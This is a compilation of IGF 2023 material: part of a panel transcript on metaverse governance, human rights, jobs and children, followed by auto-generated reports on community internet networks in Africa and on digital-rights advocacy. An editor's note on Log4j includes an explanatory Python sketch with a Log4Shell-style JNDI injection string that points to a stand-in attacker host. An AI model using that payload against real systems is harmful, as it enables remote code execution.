Yes, thank you. I would like to very briefly talk about Article 23 of the Universal Declaration of Human Rights, which says everyone has the right to work, to free choice of employment, to just and favorable conditions of work, and to protection against unemployment. The metaverse is data hungry; it basically consumes your data, just as Clara and Patrick have mentioned. And the worry is that it will remove jobs. For the first time, the World Economic Forum, in its 2023 report, has actually said that AI technologies, like the metaverse, will mean a net job loss, not a net job increase. And that means we will not be prepared, because now your skills don't matter, your experience doesn't matter, it is all saved on the metaverse, and the cost of not preparing people to get or keep jobs will be something like 11.5 trillion for training, and even more if you look at things like pensions or social security. The bigger worry is that the jobs being created are often low-paying jobs, so the human being is coming to the bottom of the supply chain. And we see this already, because some of these jobs are things like tagging content or content moderation. I'll give you an example. Roblox has a very active community, with 4.25 million developers, and if you want to earn on Roblox and convert their currency, the Robux, to actual US dollars, you have to make a minimum amount of money; out of 4.25 million developers, only 11,000 qualified. This has a direct impact on health, which is another universal right, and the impact is on well-being, especially the uncertainty of whether I get to keep my job. This also raises questions on IP: assuming my experiences and my skill sets come from the years I have spent and are uniquely mine, do I have IP on this? We also see another important thing coming in, which is behavioral addiction to technologies like this. I mentioned right at the beginning that a lot of the metaverse has been built from gaming, so we try
to gamify behavior, and we know that not just children but adults too can get addicted to games; this was declared a psychiatric disorder in 2019 by the WHO. But the worry is, as we start putting it into our daily life, into shopping, work and education, at what point will the so-called magic circle, the circle between reality and imagination, disappear? And this is something we aren't actually putting enough research into. I would also like to very briefly bring in the environment; Clara mentioned that. The metaverse requires huge amounts of data and computing power, hence it has a significant carbon footprint. Just take the semiconductor chip which is embedded in most of our technology. If you've got a mobile phone or a laptop, the average chip, when you take all of its components, travels 50,000 kilometers, and it is embedded in 169 industries. So we are looking at environmental costs in carbon and in terms of water. Because chips are not recycled, we see that e-waste is growing exponentially and less than 17 percent is recycled. This will get into your groundwater, and something like mercury we already see in fish across the ocean, so it is not contained. I just want to briefly mention one more thing: cultural representation becomes extremely important in the metaverse, and I think this is something nations will have to consider, whether it is the stereotypes being represented on the metaverse or how you actually do that. So with that, Adam, over to you.

Adam Ingle:
Thanks. I'll keep it brief, because a lot of the challenges have been discussed. One thing that has come out, and always comes out in these discussions, is how many of the issues aren't unique: they exist today, we are still grappling with solutions today, and regulation and legislation are now forming a response to them. So I think we will actually have to wait and see how the issues in Web 2.0, and the regulatory and cultural responses to them, play out, to see whether we will actually start in earnest with the metaverse from a better playing field. When it comes to kids and the challenges they face, to our mind we want to create a really kid-friendly ecosystem, one with high safety standards, responsible design, and limited avenues for harmful contact, conduct and contract. And in order to do that, to create a truly immersive ecosystem, we need others to join us and share our standards, because we can create all these great LEGO experiences, but a metaverse is interconnected, it's interoperable. So everyone needs to lift their game if we are going to have a collective approach to addressing a lot of the harms that children are going to be facing.

Irene Kitsara:
Thank you again, Adam, for leading into the last question. And again, because of time, I would ask you all to be brief. We are at the IGF, so naturally the last question is around governance of the metaverse. Could you share some key concepts? The issues, considerations and challenges we have been hearing are, I think, very much known issues from ongoing or previous discussions related to AI, generative AI, social platforms and gaming. How can we address some of these challenges, and what could be some of the considerations and elements we should bear in mind while considering governance of immersive realities? Patrick, would you like to start? Or Melodena, would you like to start?

Melodena Stephens:
Sure. When we look at governance right now, I just want to quote something from the ITU in 2003: the IGF is committed to the WSIS principles, which include the commitment to build a people-centric, inclusive and development-oriented information society. I sometimes worry whether we put technology before people. We see a lot at the national level in terms of policies; the OECD reports 800 AI policies, most of them in North America and Europe. We also see a lot of data regulations, 62 countries with 144 data regulations, but most of it is fragmentary. The metaverse will be global, and it really requires collaboration across governments. Of the few governments that have put out policies on the metaverse, most recommend self-governance, and I think this is because of the adoption curve. So you see South Korea came out with ethical principles. The Agile Nations, a coalition group, an IGO with the UK, Canada, Denmark, Italy, Singapore, Japan and the UAE, is coming out with a report this week, and again it talks about self-governance. China for the first time has actually said you can file trademarks for NFTs and virtual goods, and this is a big shift that is coming. And Australia has a white paper on standards. But again, self-governance, because the time it would take to collaborate and put together an overarching policy is too long, and we need the private sector to work with us. Now, there are standards coming out: look at something like the Metaverse Standards Forum, an association with 2,400 members, most of them private sector. Now, one of the challenges I would like to raise is open source. The metaverse builds on top of open source, with a proprietary layer, and this really creates a problem. Take, for example, a database of faces. The MegaFace dataset had 4.7 million faces scraped from Flickr; today you could do it from Instagram or from YouTube, and 80 percent of that was from these places.
And it is used in 900 research papers. So we see that open source does have some challenges that I'd like to highlight. Another one is Apache software: there is something called Log4j, a logging library that records events such as the 404 errors you see. They found a problem in its code that created a vulnerability, and what is interesting is that it is embedded everywhere: in Amazon, in Apple, in Minecraft, and in all Java systems. That is 3 billion devices. So we can see that this problem will persist, and it is not really about how much foresight you have, but how quickly and how transparently we can work together. If we penalize the private sector for being transparent, they will hide it, and that will make the vulnerability worse. That is something we need to solve. We also find that there isn't much of a way forward in some areas. For example, Barbados wanted to put an embassy online. The 1961 Vienna Convention talks only about physical embassies, but these are countries with limited resources, and if they need to be represented around the world, virtual embassies work. Again, this is a negotiated matter on which there isn't much information. I just want to highlight one more thing: most governments being represented in the metaverse are represented on top of private-sector platforms, using something like Decentraland or The Sandbox. I think this also raises interesting questions, at which point I'd like to stop and hand over.
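[Editor's note: the Log4j flaw Melodena refers to is Log4Shell (CVE-2021-44228), in which Log4j's message-lookup feature let attacker-controlled text inside a log message trigger remote JNDI lookups. As a rough illustration only, here is a minimal Python sketch of that lookup-expansion idea; the function and resolver names are hypothetical and are not Log4j's actual API.]

```python
import re

def expand_lookups(message, resolvers):
    """Naively expand ${prefix:value} tokens in a log message, mimicking
    the lookup feature at the heart of Log4Shell (CVE-2021-44228)."""
    def resolve(match):
        prefix, value = match.group(1), match.group(2)
        handler = resolvers.get(prefix)
        # Unknown prefixes are left as-is; known ones are expanded inline.
        return handler(value) if handler else match.group(0)
    return re.sub(r"\$\{(\w+):([^}]*)\}", resolve, message)

# A benign resolver, e.g. environment-style lookups:
resolvers = {"env": lambda name: {"HOME": "/home/app"}.get(name, "")}
print(expand_lookups("home dir is ${env:HOME}", resolvers))

# The danger: if a resolver (like Log4j's real 'jndi' lookup) fetched and
# executed remote code, then merely *logging* attacker-controlled input,
# such as this User-Agent value, would be enough to trigger it:
attacker_input = "${jndi:ldap://evil.example/a}"
```

The point the sketch makes is Melodena's: the expansion happens inside infrastructure code that is embedded everywhere, so a single flaw in one open-source layer propagates to every system built on top of it.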

Irene Kitsara:
Thank you, Melodena. Patrick?

Patrick Penninckx:
Yeah, when you speak about governance, I think there are a number of governance principles already enshrined in what we've done on data protection, on cybercrime, and in what we are now trying to do on artificial intelligence within the Council of Europe: questions related to responsibility, transparency, explainability, revocability, the right to contest. All of those elements need to be looked at. And obviously, when we started to work on the new convention on artificial intelligence, the first thing we did was a kind of feasibility study: look at all the ethical principles that are already out there and applicable, and at the legislation that is out there and would be applicable to the metaverse; then look at where the gaps are; and once we have identified the gaps, look at which elements could constitute a future governance framework. I think I'll leave it at that.

Clara Neppel:
Thank you, Patrick. Well, I think what we hear more and more from the private sector as well is that there is a need for interoperability of regulation, of regulatory requirements, and one way to achieve this is through global standards. It is important to say that standards are there to move from principles to practice, to actually operationalize regulation; this would be the top-down approach, and it is important. But we also see a bottom-up approach. In IEEE, we have been working since 2015 on ethically aligned design initiatives, which resulted in a set of standards, from value-based design, which can also be used for the metaverse, to defining more closely what transparency is and what it means to have age-appropriate design. I think, Adam, you're a part of that. So I think we need to bring together these top-down and bottom-up approaches in order to create a framework that works for everyone. I will just leave it here because we want to have some questions as well. Thank you.

Irene Kitsara:
Yes, and I would like now to turn to the audience and see if you have any questions for our panelists. I hear we also have an online question; maybe we can start with that, and you can think in the meantime.

Audience:
Does this work? Can you hear me? Yes. So I will just read the question in the chat from Nina Jane Patel: with increasing immersion of users into these virtual realms, there is potential access to a plethora of biometric data, from eye tracking to brain activity to heart rate. How do you envision the governance and regulation of such intimate data in the metaverse? Furthermore, what steps do you believe need to be taken to ensure that individuals' biometric data remains private and protected from misuse? Thank you.

Irene Kitsara:
So I can address what we have identified in the report; maybe that will give an overview of some of the issues identified by the experts. Indeed, we will be looking at much more invasive practices of surveillance and censoring. Our experts have been looking into the idea of rethinking privacy, rethinking what it means. There are various advocates for the introduction of so-called neurorights; in Chile, these have even been covered in the constitution, while on the other side there are differing views. There are also issues around bystander privacy: not just your own privacy, which you can potentially consent about, but also, for example, that of the people who may be in the same room with you and do not know that they are being recorded along with you. So there is indeed a plethora of questions, and there are different views on the governance of all this: whether some self-regulation or self-governance principles could help, or whether we should be looking at the reinterpretation of existing hard law or the introduction of new law. Do we have any questions? Please, the gentleman.

Audience:
Good morning. Thank you for letting me participate in your town hall panel. It’s very interesting, especially when we talk about what is immersive, or by now perhaps simply life, technology, or even existence. And from that perspective, we in Poland, because I come from Poland, have a different consideration right now. The biggest tension is not around freedom of expression, nor even personal data and privacy, but much more, and maybe it is only one of the future tensions, freedom of conscience: not from the religious point of view, but from the point of view of the psychophysical integrity of the person. And from that perspective, I would like to ask if you can suggest how to deal with this. It is, of course, part of fundamental rights, but from the technical point of view it is challenging, I understand this. I thought it was worth putting the question on the table. Thank you.

Patrick Penninckx:
I remember chanting in one of the demonstrations in Belgium in the 1980s that thoughts are free. I don’t know if thoughts will still be free, and that is freedom of conscience indeed. Once we start to look into the interaction between machine and man, and if we see that technology already enhances or has the capacity to influence our behavior, to what extent will it influence our thought processes? I think our thought processes are already being influenced by the messages that we receive very directly; otherwise, how could you explain that entire populations can be influenced in a certain manner? When I looked at the Edelman Trust Barometer, I saw that in authoritarian regimes, trust in public service media is the highest. This seems contradictory, but it is also quite revealing of how a regime, whether a private or a public entity, can actually influence the way people, maybe not think, but at least act according to what is expected of them. So freedom of thought, and freedom of religion, because this too is enshrined in the European Convention on Human Rights, are definitely things which are at stake and that would need to be looked at. Thank you.

Clara Neppel:
If there are no other questions, Robert, I will share my personal view. I think that we are now discussing much more about moderation, practically about content moderation and whether it should be private or public. And probably, in order to have a certain balance, we need multi-stakeholder moderation at some point. Since we are here at the Internet Governance Forum, this should be at the heart of the discussions, because, as Patrick mentioned before, a democratic process cannot happen if you do not have anonymity, first of all; I think that is important. If you don’t have anonymity, you cannot actually exercise your rights as a citizen. But that is my private view.

Irene Kitsara:
Just shortly on that: we identify in the report this notion of mental privacy and mental autonomy, and practically the reinterpretation of notions that we knew, like freedom of expression, and what they mean nowadays with these technologies, which have the potential of changing not just our perception of reality, but even our thought processes and even the facts. Thank you.

Audience:
Oh, hi, my name is Michael Kernikos, I’m the Executive Director of the UCLA Institute for Technology Law and Policy. I wanted to pick up on what you said about content moderation, because as far as I understand it, the tools to moderate content effectively at scale do not exist for these technologies. So it’s fine right now as long as adoption rates are where they are, but if these things take off rapidly, there’s no actual way to follow the standards that already exist for traditional social media platforms. So is that something that you’re looking into? This is a legal challenge and a policy challenge as well as a technical challenge.

Okay, thank you very much. I’m Steve Fosley from UNICEF. We also did a short report on the metaverse and children and some of the rights involved, so hopefully that was useful. My question is, and sorry, maybe this is too big a question for this time, but I’m from South Africa originally: your thoughts on how the metaverse will play out over time? Because not everybody can afford the $500 or $3,500 headset, and not everybody will. So if these technologies are going to actually scale globally, and that’s also a question, but I think they will, they’re going to look very different for users in South Africa, in Johannesburg or Cape Town, than for children, and obviously I’m looking at children, in New York, or at least some children in New York. And perhaps we’ve seen some signals of this beginning with people talking to cloned characters; you might be talking to them on WhatsApp, it doesn’t have to be in an immersive environment, but it’s beginning to normalize talking to AI, basically. And you’re not always sure if that’s a person or not. So any thoughts on how this might play out? If there isn’t time now, I’ll be here for the next few days, so I’d love to have a coffee and pick your brains. Thank you.

Irene Kitsara:
Who would like to?

Melodena Stephens:
I need a little microphone. Yes. Was it Adam who was going to go ahead? Please. Oh, so I was just going to say one thing: when we look at the metaverse, the standards generally come from the IT sector, right? Or the technology sector. But we’re seeing now health coming into that. So it’s really important we don’t approach this in silos; ministries have to work together. That means health has to sit with social affairs, if you see an impact on people, communities and society, but you also have to sit and work with technology. And that’s missing right now. So, for example, content is being developed for schools, and I don’t know if there’s a psychologist or sociologist involved. I think in Adam’s company they do, but in many cases this is not necessarily true. On the question of inclusiveness: these technologies will get cheaper and cheaper. So I see that actually happening, because these technologies are only viable at scale; that’s the only way they will work. But then there’s the danger that they will be affordable and embedded, and you cannot get rid of them. Think of ChatGPT: everyone’s using it, and now we’re trying to figure out how we can use it more, or what we can do to regulate it. So we’re right now at that wonderful time. We’ve got a ten-year window to have these conversations and come up with the safeguards. And that’s why I think these dialogues are so critical. Thank you.

Irene Kitsara:
Thank you, Melodena. And I think we need to stop here, but talking about partnerships, I would like to share with you one result of the digital partnership between IEEE and the Council of Europe: stay tuned for the upcoming report on the metaverse and its impact on human rights, the rule of law and democracy, which is expected to be released in early 2024. Thank you very much, and thanks to our panelists, the organizers and, of course, our host. Thank you.

Adam Ingle

Speech speed

172 words per minute

Speech length

700 words

Speech time

244 secs

Audience

Speech speed

181 words per minute

Speech length

644 words

Speech time

213 secs

Clara Neppel

Speech speed

162 words per minute

Speech length

1918 words

Speech time

713 secs

Hugh

Speech speed

158 words per minute

Speech length

541 words

Speech time

205 secs

Irene Kitsara

Speech speed

172 words per minute

Speech length

1334 words

Speech time

465 secs

Melodena Stephens

Speech speed

176 words per minute

Speech length

2440 words

Speech time

832 secs

Patrick Penninckx

Speech speed

144 words per minute

Speech length

2769 words

Speech time

1150 secs

Africa Community Internet Program Donation Platform Launch | IGF 2023 Launch / Award Event #176

Table of contents

Disclaimer: This is not an official record of the IGF session. The DiploAI system automatically generates these resources from the audiovisual recording. Resources are presented in their original format, as provided by the AI (e.g. including any spelling mistakes). The accuracy of these resources cannot be guaranteed. The official record of the session can be found on the IGF's official website.

Knowledge Graph of Debate

Session report


Yusuf Abdul-Qadir

The discussions held at the UN Internet Governance Forum in Kyoto highlighted the importance of inclusion and ensuring that no one is left behind in the expansion of the internet. The focus was on making the internet inclusive and accessible to all, regardless of their background or location. The talks recognized technology as a crucial tool in enhancing community networks and promoting internet accessibility. It was emphasized that technology can play a significant role in bridging the digital divide and empowering communities.

One of the key initiatives discussed at the forum was the Africa Community Internet Program, together with EODIRF. The aim of this program is to involve regulators, communities, and members of parliament in bringing digitalization to the grassroots level. EODIRF works across Africa and collaborates with regional regulators, policymakers, and other internet-connecting organizations.

The importance of empowering individuals with the necessary skill set to set up and maintain networks was emphasized. It was noted that people in rural communities need to acquire specific skills to adapt to digitalization. Furthermore, it was suggested that innovation should stay within the community to ensure better sustainability.

During the forum, the concept of the ‘internet backpack’ was introduced as a solution to bridge the digital divide. This innovative concept allows people to engage with and experience the internet firsthand. Participants also emphasized the significance of dialogue, engagement, and innovative solutions, such as the internet backpack, in bridging the digital divide, and it was suggested that launching a new way to connect through the program’s website, AGCIP, could advance this goal.

One interesting aspect highlighted in the discussions was that the technology being developed for community networks was not designed to be imposed by the West. Instead, it was designed and innovated by individuals from the Democratic Republic of Congo and Haiti, showcasing the significance of local innovation in shaping technological advancements.

The ultimate goal of the initiatives discussed at the forum, including the African community Internet program, is to bring the technology to the African continent, enabling communities to be self-sufficient and sustainable. This approach emphasizes community engagement and a bottom-up approach to development, working with communities and building from grassroots levels. The aim is not to export technology but to create an ecosystem where communities can be self-sufficient.

Overall, the forum emphasized the importance of inclusion, accessibility, and engagement in the expansion of the internet. The discussions brought to light the need for empowering individuals with the necessary skills for digitalization, promoting dialogue and innovative solutions, and fostering local innovation for sustainable development. The participation of all attendees, both physical and virtual, was greatly appreciated, and there is a recognition that more conversations and development are needed to advance the African community Internet program and other similar initiatives.

Audience

The Internet Backpack was unveiled in a presentation, and concerns were raised about its sustainability, maintenance, and the handling of e-waste. Christine, a regulator at the Uganda Communications Commission, attended the presentation and expressed concerns about the end-of-life management of IT equipment and the resulting e-waste. She also questioned who would handle maintenance and technical support in case of equipment failure. Christine suggested that community ownership of such technology could imbue significance and support from community members.

Christine also raised questions about the provision of technical support and the management of e-waste, voicing concerns about support for operation and maintenance costs and asking about provisions for dealing with e-waste once the equipment reaches its end of life.

Discussions took place with a large firm about the lifecycle management of the Internet Backpack and potential e-waste recycling solutions. It was noted that under US law, manufacturers bear the responsibility for e-waste.

Training on operating the Internet Backpack was discussed, with the belief that anyone who can operate a smartphone can operate the backpack. One slide and videos in English and Spanish were presented for training purposes.

The possibility of local manufacture and a decentralized approach for the Internet Backpack was raised, since shipping devices can account for up to 80% of costs, and some components may not be available locally in certain countries. Collaboration with local manufacturers or fab labs was suggested as a potential solution.

Co-creation and a community-centered design approach were advocated for, emphasizing the importance of sitting down with community members and designing solutions that meet their specific needs. It was suggested that solutions could vary based on community needs.

The Internet Backpack comes in different versions, with or without a satellite unit, which affects the price. Furthermore, the design of the backpack is modular, allowing for the connection of additional storage or other features; the system is not closed and allows for additional connections.

There was curiosity among the audience about the possibility and necessity of a server connection for building a community. The role of an email relay server in the community was also questioned.

A cloud-to-edge solution was discussed, which includes core components such as a router, a battery, and a solar panel. It was mentioned that users can add additional components as per their needs, including an email server or a separate router.

There was curiosity among the audience if anyone had added a server to the cloud-to-edge solution before. Unfortunately, no specific evidence or facts were provided to answer this question.

The importance of unlocking universal service funds for financial sustainability was emphasized. The Association for Progressive Communications has been advocating and supporting community networks for many years, and it was noted that business models and organizational compliance are necessary for unlocking funds.

Lastly, there was advocacy for increasing support and capacity building for community networks globally, particularly in Africa. It was encouraging to see more people advocating and working on increasing skills and capacity. It was also stressed that financial sustainability is as important as social, technical, and environmental sustainability.

In conclusion, the Internet Backpack presentation sparked discussions and raised important concerns about sustainability, maintenance, and e-waste management. Training, local manufacture, and community-centered design were also highlighted as key considerations. The different versions and modular design of the backpack provide flexibility for users. The necessity of a server connection and the importance of unlocking universal service funds were also topics of interest. Overall, there is a need for increased support and capacity building for community networks globally, with a particular focus on Africa.

Lee W McKnight

The analysis reveals several key points related to internet access and the Internet Backpack. An important fact is that around 2.6 billion people worldwide still do not have access to the internet. This lack of internet access has significant implications for issues such as the digital divide and reduced inequalities (SDG 9: Industry, Innovation and Infrastructure and SDG 10: Reduced Inequalities). The large number of people without internet access highlights the urgent need to address this issue.

However, there are positive efforts being made to improve internet access. One such effort is the Africa Community Internet Program, which was introduced in 2022. This program aims to increase dialogue with African nations and collaborate with numerous organisations to help increase internet accessibility. This initiative demonstrates a positive step towards bridging the digital divide in Africa, particularly in remote or underserved areas.

Another noteworthy point is the importance of community networks in improving connectivity. Community networks, which can be powered by the Internet Backpack, are highlighted as a significant contribution to addressing the issue of limited internet access. These networks are owned and operated by members of the community, allowing for greater accessibility and connectivity for local residents. By empowering communities to create their own networks, connectivity can be extended to areas where traditional infrastructure may not be available or feasible.

Government cooperation is also identified as crucial for improving internet access. The analysis suggests that progress in addressing the issue of limited internet access could be faster, easier, and better with greater cooperation between national governments. It is encouraging to note that some national governments have already started authorising and allowing community networks, showing a positive shift towards recognising the importance of collaborative efforts in improving internet access.

The Internet Backpack itself is a solar-powered microgrid that serves as an effective solution for improving internet access, particularly in emergency situations. It is designed to connect up to 250 devices simultaneously, providing connectivity via Wi-Fi, 4G, 5G, or satellite. This makes the Internet Backpack a versatile and adaptable solution that can be deployed in various settings and situations.

Furthermore, the sustainability of the Internet Backpack is under discussion with a large firm, particularly in terms of e-waste recycling and lifecycle management. This demonstrates a commitment to responsible consumption and production (SDG 12: Responsible Consumption and Production) and highlights the importance of considering the environmental impact of technological solutions.

The Internet Backpack comes with a full warranty, providing assurance to users about the product’s quality and functionality. It is designed to be operable without requiring special skills, making it accessible to a wide range of users. To support users, instructional videos in English and Spanish are available to train an Internet Backpack operator. The simplicity of operation, coupled with the availability of training materials, further enhances the user experience and accessibility of the Internet Backpack.

Technical support is available to users, with interactions and collaborations with organisations such as the Internet Society, ICANN, and other local communities per country. This collaborative approach ensures that users can receive assistance and guidance in operating and troubleshooting the Internet Backpack. Remote support is also provided, allowing for remote access and diagnostics, further enhancing the convenience and effectiveness of technical support.

It is worth noting that there is a commitment to creating an open source version of the hardware, although the software is currently patented. This commitment aligns with the aim of reducing inequalities (SDG 10: Reduced Inequalities) and ensuring that the benefits of technology are accessible to all. The open source version of the hardware would allow for greater customisation and adaptation to meet specific needs and requirements.

Lastly, the Internet Backpack is not a closed system and can connect with other storage and devices. This flexibility allows for seamless integration with existing infrastructure and expands the capabilities of the Internet Backpack. This feature contributes to the versatility and adaptability of the Internet Backpack, making it a powerful tool for improving internet access in various contexts.

In conclusion, the analysis highlights the significant issue of limited internet access, with around 2.6 billion people worldwide lacking connectivity, and the positive efforts being made to address it, such as the Africa Community Internet Program and the use of community networks. Government cooperation is deemed crucial. The Internet Backpack, a solar-powered microgrid that can connect up to 250 devices, provides connectivity including in emergency situations; its sustainability is under discussion with a large firm, reflecting a commitment to responsible consumption and production. It comes with a full warranty, is designed to be user-friendly, and is backed by technical support and remote assistance. The commitment to creating an open source version of the hardware reflects the aim of reducing inequalities, and because the backpack is not a closed system, it can connect with other devices, providing the flexibility and adaptability needed to improve internet access in various contexts.

Kwaku Antwi

Community networks are a relatively new and distinct phenomenon compared to high-level broadband networks. These networks play a crucial role in empowering individuals at the grassroots level by equipping them with the necessary skills to establish and maintain their own networks. This level of empowerment not only leads to greater sustainability but also enables innovative practices to thrive within the community.

Furthermore, it is essential to engage with policymakers, regulators, and parliamentarians to garner support and authorization for the transition and implementation of community network technology. Policymakers have the authority to enact laws and regulations that govern the use of specific equipment, making their involvement crucial in facilitating the adoption of community networks. By comprehending the concepts and benefits associated with these networks, policymakers can smooth the transition to community network technologies.

The African Open Data International Research Foundation (EODIRF) actively contributes to the development of a network that brings together regional regulators, policymakers, and various organizations involved in internet connectivity across Africa. EODIRF’s commitment to engaging with policymakers and regulators across the continent aims to collaboratively enhance networks and propel grassroots digitalization. By sharing experiences and knowledge with stakeholders, EODIRF strives to improve network infrastructure and promote the widespread adoption of community networks, ultimately driving socio-economic development.

In conclusion, community networks have a significant impact on empowering individuals at the grassroots level by providing them with the skills needed to establish sustainable and innovative networks. Engaging with policymakers and regulators is vital for the successful authorization and transition of community network technology. The African Open Data International Research Foundation’s involvement in building a comprehensive network of regional regulators, policymakers, and internet connectivity organizations demonstrates their dedication to enhancing African networks and promoting grassroots digitalization across the continent.

Jane Coffin

Community networks have emerged as a solution to address infrastructure gaps in underserved areas, including both urban and remote locations. These networks are built from the community out, allowing for more control over connectivity. This approach is gaining traction as an effective way to bridge the digital divide.

Training local individuals to become trainers themselves is crucial for the sustainability of community networks. This empowers the community to take ownership of the network and tailor it to their specific needs. Technical, community development, and local grant-making training are key aspects of this process.

Community networks provide an alternative to traditional forms of connectivity that have failed to reach many communities in urban, rural, remote, unserved, and underserved areas. The success of community networks can be seen in various geographical locations, such as Nairobi, Latin America, and Africa.

Funding is a vital component for community network development. Efforts are being made to decolonize funding, exploring sources such as philanthropic funding, capital from commercial entities and banks. Initiatives like the UN Giga project aim to increase funding opportunities in Sub-Saharan Africa.

Spectrum management plays a crucial role in creating community networks. Collaboration with regulators and policymakers is important to effectively utilize licensed spectrum. However, many community networks currently rely on unlicensed spectrum. Striking a balance between licensed and unlicensed spectrum is necessary for the availability and sustainability of these networks.

Overall, community networks offer a promising approach to address connectivity challenges in underserved areas. By empowering local communities, providing necessary training, exploring diverse funding sources, and navigating spectrum regulations, these networks can create a more inclusive and resilient digital infrastructure for all.

Jane Appih-Okyere

Jane Appih-Okyere is an advocate for improving internet connectivity in rural areas of Ghana in order to enhance education outcomes for children and foster teacher professional development. Her research involved setting up an internet backpack in a rural library specifically for teacher professional development. The introduction of internet access in this setting led to a notable increase in children visiting the library and using online resources, ultimately improving their learning experiences.

One of the key advantages of the internet backpack was the ability for teachers to download and utilize educational videos for classroom teaching purposes. This provided them with an additional tool to engage and educate their students, enhancing the overall educational experience. Additionally, the centralized internet access fostered stronger social connections among teachers, leading to greater collaboration and the sharing of innovative teaching methods. This collaboration, in turn, resulted in an improved learning experience for students.

However, Jane Appih-Okyere also noted a gender disparity in the usage of the provided internet access. Although there was initially an increase in girls’ usage, over time their usage decreased, while boys maintained higher levels of usage. This raises concerns about potential barriers hindering girls from benefiting equally from the educational opportunities provided by the internet. Jane emphasizes the need for further research to identify the underlying factors causing this disparity and develop strategies to ensure equal access and usage for all students.

In conclusion, Jane Appih-Okyere’s research underscores the importance of improving internet connectivity in rural areas of Ghana to enhance education outcomes for children and foster professional development among teachers. The introduction of the internet backpack in a rural library resulted in increased usage of online resources by children, consequently improving their learning experiences. Moreover, the availability of internet access facilitated collaboration among teachers, leading to the sharing of knowledge and improved teaching practices. However, Jane’s observation of a gender disparity in internet usage emphasizes the need for further investigation and intervention to ensure equal access and opportunities for all students.


Advocacy to Action: Engaging Policymakers on Digital Rights | IGF 2023

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Fernanda Kalianny Martins Sousa

The political climate in Brazil is currently frustrating for civil society organisations, as it hampers their social participation in discussions related to internet governance. While Brazil has been known for its experiments in participatory governance, the new Lula government seems to be lacking the same level of participation as before. This negative sentiment is driving the argument that the political climate is hindering civil society organisations from fully engaging in discussions.

One aspect of internet regulation being discussed in Brazil is Bill 2630, a proposed law aimed at regulating online platforms. Although the bill has been under discussion for the past three years, its fate remains uncertain, even though some argue that it is a good law with only a few problems. Civil society organisations have been actively working on it, with the intention of countering the previous government’s approach to internet governance.

Another point of concern is the complexity of the political landscape in relation to platform regulation in Brazil. Political factors and a lack of government consultation with civil society have made the process more intricate. The argument is that the government needs to consider the input of civil society organisations to address these concerns effectively.

Efforts to bring civil society together in Brazil to discuss online regulation have been ongoing for several years. Internet Lab, along with over 50 organisations across the country, has played a significant role in these discussions. Federal Deputy Orlando Silva has also been instrumental in bringing these discussions to parliament. The sentiment around these efforts is neutral, indicating that there is progress in bringing civil society together for these discussions.

The failure of self-regulation in the internet sector is a cause of concern. Even ten years after the approval of Marcos Civil, self-regulation is seen as ineffective. This negative sentiment highlights the importance of learning from past mistakes and ensuring that any form of regulation, including state regulation, is flexible and able to evolve as needed.

Connecting international, national, and local levels in the regulation of internet governance is both challenging and necessary. Internet Lab has been actively working towards this goal. By working in conjunction with different fields in Brazil and the global South, they have been able to push legal boundaries and regulations combating issues such as disinformation.

In Brazil, the need to address political gender-based violence and hate speech against women online is recognised. Efforts have been made to enforce and utilise a law against political gender-based violence. There are also ongoing efforts to approve points related to a law against hate speech online against women in the election mini-reform. The sentiment here is positive, indicating that taking action against these issues is seen as necessary and commendable.

In conclusion, the current political climate in Brazil is creating challenges for civil society organisations in their engagement in discussions related to internet governance. The uncertain fate of Bill 2630, the complexity surrounding platform regulation, and the issues of self-regulation in the internet sector are significant concerns. However, there are ongoing efforts to bring civil society together, connect different levels of governance, and address specific issues like political gender-based violence and hate speech.

Internet Bolivia Foundation

The analysis highlights the effectiveness of working at the municipal and local levels for digital governance. One notable advantage is that municipalities have a better understanding of local needs, enabling them to tailor policies more accurately to meet the specific requirements of their communities. Furthermore, the absence of excessive bureaucracy allows them to handle policies more swiftly and efficiently.

Another benefit of local regulations is their potential as pilot initiatives for other municipalities. When a municipality successfully implements digital regulations, it serves as a model and encourages other jurisdictions to adopt similar policies. This ripple effect is particularly evident in the case of Coroico, where the implementation of regulations led numerous other municipalities to express their interest in adopting comparable policies.

The analysis also underscores the importance of continuous engagement with communities for effective digital governance. Hosting workshops and maintaining a regular presence in communities helps to spread digital literacy and build support for digital policies. It has been found that people are more likely to support and participate when they have a better understanding of the issues at hand. For example, in Villa Montes, the local population expressed eagerness to learn more about digital rights and requested workshops on the subject.

Notably, the Internet Bolivia Foundation advocates for identifying key champions on specific issues and encourages the involvement of municipalities and local communities in particular topics. These champions can play a vital role in enacting beneficial regulations and driving digital governance initiatives at the community level.

In conclusion, working at the municipal and local levels proves to be highly effective for digital governance. The analysis demonstrates the numerous advantages of this approach, such as a better understanding of local needs, quicker policy implementation, and the potential for pilot initiatives. Continuous engagement with communities, including hosting workshops and involving key champions, fosters digital literacy and enhances support for digital policies. The Internet Bolivia Foundation recognises the power of community-level work and actively advocates for its implementation.

Nick Benequista

The analysis delves into various aspects of policy intervention and awareness, focusing on the positive sentiment towards Liza Garcia’s comprehensive approach. Nick Benequista praises Liza for actively participating in the drafting and implementation of laws, in policy shaping, and in raising public awareness of digital laws. Liza’s well-rounded involvement demonstrates her dedication to effective policy intervention.

Furthermore, Nick expresses interest in the influence of civil society on legislative agenda setting. He questions whether civil society can exert influence in determining which legislation gets passed or regulated. This showcases Nick’s curiosity about the extent of civil society’s involvement and impact on policy matters, particularly in the legislative process.

The analysis also highlights the proactive approach of Internet Lab in engaging with policy processes. It mentions that Internet Lab has been actively addressing internet governance issues for the last nine years and has collaborated with a coalition of over 50 organizations in Brazil. This underscores the organization’s commitment and effectiveness in tackling internet governance concerns.

Additionally, the importance of having allies in parliament for effective policy engagement is emphasised. The analysis notes the crucial role of Federal Deputy Orlando Silva in platform regulation discussions, underscoring the significance of building alliances and having supportive individuals within the legislative sphere to advance effective policy-making.

The analysis reinforces the importance of serving the public interest in governance. It underlines the necessity of public accountability as a crucial aspect of policy-making. Policymakers are expected to prioritize the public’s well-being and uphold the principles of transparency and accountability.

However, the analysis also raises concerns about imperfect accountability mechanisms. Nick expresses apprehension that policymakers may be influenced by narrow interests, including personal interests, which can hinder their ability to effectively serve the public interest. This draws attention to the need for robust accountability mechanisms to ensure policymakers remain focused on the public’s welfare.

